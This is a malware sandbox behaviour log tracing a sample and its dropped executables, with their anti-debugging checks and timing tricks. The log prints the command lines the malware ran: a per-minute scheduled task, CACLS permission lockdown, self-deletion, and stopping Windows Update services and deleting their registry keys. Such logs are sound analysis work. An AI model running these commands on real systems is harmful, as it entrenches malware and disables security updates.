Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 11B0005 value: E9 FB 42 B2 75 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 76CD4300 value: E9 0A BD 4D 8A |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\ProgramData\61312899942613011832.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\1000018002\avicapn32.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Users\user\1000018002\avicapn32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000176B0FE second address: 000000000176B10D instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000014D7B49 second address: 00000000014D7B51 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 movzx ecx, si 0x00000006 inc ecx 0x00000007 pop eax 0x00000008 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016693EB second address: 0000000001669432 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 xchg eax, edi 0x00000004 inc ecx 0x00000005 pop eax 0x00000006 dec eax 0x00000007 cmovbe eax, eax 0x0000000a inc cx 0x0000000c xchg esp, ebx 0x0000000e inc ecx 0x0000000f pop edx 0x00000010 inc ecx 0x00000011 xchg bh, cl 0x00000013 dec eax 0x00000014 cwde 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 pop ecx 0x00000019 inc bp 0x0000001b movsx esp, dl 0x0000001e cwd 0x00000020 lahf 0x00000021 inc ecx 0x00000022 pop ecx 0x00000023 inc ecx 0x00000024 movzx ebx, si 0x00000027 inc eax 0x00000028 setb bh 0x0000002b inc cx 0x0000002d xchg esp, ebx 0x0000002f pop esi 0x00000030 movzx eax, bp 0x00000033 inc cx 0x00000035 movsx eax, al 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a setb ah 0x0000003d inc ebp 0x0000003e movzx esi, ax 0x00000041 inc ecx 0x00000042 pop esp 0x00000043 dec esp 0x00000044 movzx esi, ax 0x00000047 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016D9DA1 second address: 00000000014DE6C8 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 pop ebp 0x00000004 dec esp 0x00000005 arpl dx, ax 0x00000007 dec ecx 0x00000008 cmovb edi, ecx 0x0000000b inc ecx 0x0000000c pop ebx 0x0000000d inc ebp 0x0000000e mov bh, bh 0x00000010 dec ecx 0x00000011 arpl dx, cx 0x00000013 inc ecx 0x00000014 pop eax 0x00000015 cbw 0x00000017 dec eax 0x00000018 movsx ecx, di 0x0000001b dec ebp 0x0000001c cmovle esi, eax 0x0000001f inc ecx 0x00000020 pop edx 0x00000021 cbw 0x00000023 jmp 00007FB5AC78D92Ch 0x00000028 inc ecx 0x00000029 pop edi 0x0000002a inc esp 0x0000002b movzx ecx, si 0x0000002e pop ecx 0x0000002f cwde 0x00000030 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000176451B second address: 000000000176452D instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edx 0x00000004 dec ecx 0x00000005 movzx ebx, ax 0x00000008 inc ecx 0x00000009 pop edi 0x0000000a cbw 0x0000000c pop ecx 0x0000000d inc eax 0x0000000e mov dh, dh 0x00000010 inc ecx 0x00000011 pop ecx 0x00000012 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000176452D second address: 000000000176453B instructions: 0x00000000 rdtsc 0x00000002 inc cx 0x00000004 bswap esi 0x00000006 pop esi 0x00000007 inc esp 0x00000008 mov ah, dl 0x0000000a pop edi 0x0000000b dec esp 0x0000000c arpl bp, si 0x0000000e rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016FA149 second address: 0000000001BA06F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5ACE2F84Fh 0x00000007 inc ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a inc ecx 0x0000000b mov bl, bl 0x0000000d pop edi 0x0000000e movsx eax, bp 0x00000011 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000173E4D5 second address: 0000000001696CB2 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 cwd 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 lahf 0x00000008 pop esi 0x00000009 pop edi 0x0000000a lahf 0x0000000b dec ebp 0x0000000c arpl bp, sp 0x0000000e pop ebx 0x0000000f jmp 00007FB5AC8E17FCh 0x00000014 inc ecx 0x00000015 pop esp 0x00000016 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016C0841 second address: 000000000172F30A instructions: 0x00000000 rdtsc 0x00000002 inc esp 0x00000003 movsx ebp, bx 0x00000006 inc ecx 0x00000007 pop ebp 0x00000008 inc bp 0x0000000a movzx edi, cl 0x0000000d pop ebp 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 inc ecx 0x00000011 pop eax 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 inc ebp 0x00000015 movsx edi, dx 0x00000018 dec ebp 0x00000019 arpl si, si 0x0000001b dec eax 0x0000001c movzx edx, di 0x0000001f inc ecx 0x00000020 pop edi 0x00000021 mov si, 6F30h 0x00000025 dec eax 0x00000026 cdq 0x00000027 dec eax 0x00000028 movsx ebx, bp 0x0000002b pop ecx 0x0000002c jmp 00007FB5AC9F7D3Ch 0x00000031 inc ecx 0x00000032 pop ecx 0x00000033 cdq 0x00000034 inc cx 0x00000036 movsx eax, dh 0x00000039 inc esp 0x0000003a movsx esp, bp 0x0000003d pop esi 0x0000003e cbw 0x00000040 pop edi 0x00000041 pop ebx 0x00000042 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000172F30A second address: 000000000172F310 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop esp 0x00000004 cwd 0x00000006 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016B2E25 second address: 00000000016B2E5E instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov edi, 61C07295h 0x00000009 inc ecx 0x0000000a pop eax 0x0000000b dec eax 0x0000000c cdq 0x0000000d dec ebp 0x0000000e movsx esp, sp 0x00000011 lahf 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 dec eax 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 movzx ax, ah 0x0000001c cwd 0x0000001e cdq 0x0000001f pop ecx 0x00000020 inc ecx 0x00000021 pop ecx 0x00000022 inc esp 0x00000023 movzx esp, di 0x00000026 inc ebp 0x00000027 movsx esp, dx 0x0000002a inc ecx 0x0000002b xchg dh, al 0x0000002d pop esi 0x0000002e cbw 0x00000030 dec ecx 0x00000031 arpl sp, bx 0x00000033 inc cx 0x00000035 movzx eax, bl 0x00000038 pop edi 0x00000039 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000010EEF30 second address: 00000000010EEF3F instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc |
Source: C:\ProgramData\61312899942613011832.exe | RDTSC instruction interceptor: First address: 00000000017925FE second address: 00000000017B33CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC943F91h 0x00000008 call 00007FB5AC8E2811h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA956AAh 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc |
Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 000000000527D526 second address: 000000000527D559 instructions: 0x00000000 rdtsc 0x00000002 movsx dx, bh 0x00000006 dec cl 0x00000008 or edx, ecx 0x0000000a bts edx, ecx 0x0000000d xchg dh, dh 0x0000000f not cl 0x00000011 cbw 0x00000013 neg cl 0x00000015 bsf eax, eax 0x00000018 mov eax, 78B605B0h 0x0000001d or ah, FFFFFF9Eh 0x00000020 add cl, FFFFFF94h 0x00000023 xor bl, cl 0x00000025 or dh, dl 0x00000027 push ebp 0x00000028 inc ebp 0x00000029 cdq 0x0000002a cwd 0x0000002c push esi 0x0000002d push ebx 0x0000002e xor bp, di 0x00000031 cwd 0x00000033 rdtsc |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | RDTSC instruction interceptor: First address: 00007FF676941E5F second address: 00007FF676941E7F instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | RDTSC instruction interceptor: First address: 00007FF6768E9972 second address: 00007FF6768E99A1 instructions: 0x00000000 rdtsc 0x00000002 inc eax 0x00000003 rcr dh, FFFFFFDEh 0x00000006 pop esi 0x00000007 dec ecx 0x00000008 shl edi, cl 0x0000000a dec eax 0x0000000b cdq 0x0000000c pop ecx 0x0000000d dec ebp 0x0000000e movzx ecx, di 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 inc dx 0x00000018 inc ecx 0x00000019 pop edx 0x0000001a dec eax 0x0000001b cwde 0x0000001c ror ebx, cl 0x0000001e pop ebp 0x0000001f adc al, DDh 0x00000021 popfd 0x00000022 bswap dx 0x00000025 inc esp 0x00000026 movsx esi, bp 0x00000029 inc ecx 0x0000002a pop eax 0x0000002b inc ecx 0x0000002c sete ah 0x0000002f rdtsc |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | RDTSC instruction interceptor: First address: 00007FF675F42B33 second address: 00007FF675F42B4C instructions: 0x00000000 rdtsc 0x00000002 movzx edi, sp 0x00000005 inc ecx 0x00000006 pop esp 0x00000007 not dx 0x0000000a inc ecx 0x0000000b pop ebp 0x0000000c inc ecx 0x0000000d pop esi 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 dec eax 0x00000011 movsx eax, sp 0x00000014 pop edi 0x00000015 dec ecx 0x00000016 movzx ebx, cx 0x00000019 rdtsc |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | RDTSC instruction interceptor: First address: 00007FF675F9FC76 second address: 00007FF675F9FC96 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc |
Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000106587EA second address: 0000000010658809 instructions: 0x00000000 rdtsc 0x00000002 ror cl, 1 0x00000004 ror edx, FFFFFF86h 0x00000007 xor ax, si 0x0000000a not cl 0x0000000c clc 0x0000000d xor bl, cl 0x0000000f push esi 0x00000010 push edi 0x00000011 rol dh, FFFFFF9Dh 0x00000014 rcl eax, cl 0x00000016 test bx, bx 0x00000019 push ebx 0x0000001a mov ebx, ecx 0x0000001c movsx eax, di 0x0000001f rdtsc |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process queried: DebugPort |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process queried: DebugObjectHandle |
Source: C:\ProgramData\61312899942613011832.exe | Process queried: DebugPort |
Source: C:\ProgramData\61312899942613011832.exe | Process queried: DebugObjectHandle |
Source: C:\ProgramData\61312899942613011832.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugPort |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugObjectHandle |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process queried: DebugPort |
Source: C:\Users\user\1000018002\avicapn32.exe | Process queried: DebugPort |
Source: C:\Users\user\1000018002\avicapn32.exe | Process queried: DebugObjectHandle |
Source: C:\Users\user\1000018002\avicapn32.exe | Process queried: DebugPort |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugObjectHandle |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process queried: DebugPort |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe" |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit |
Source: C:\ProgramData\61312899942613011832.exe | Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: unknown unknown |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: unknown unknown |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0 |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
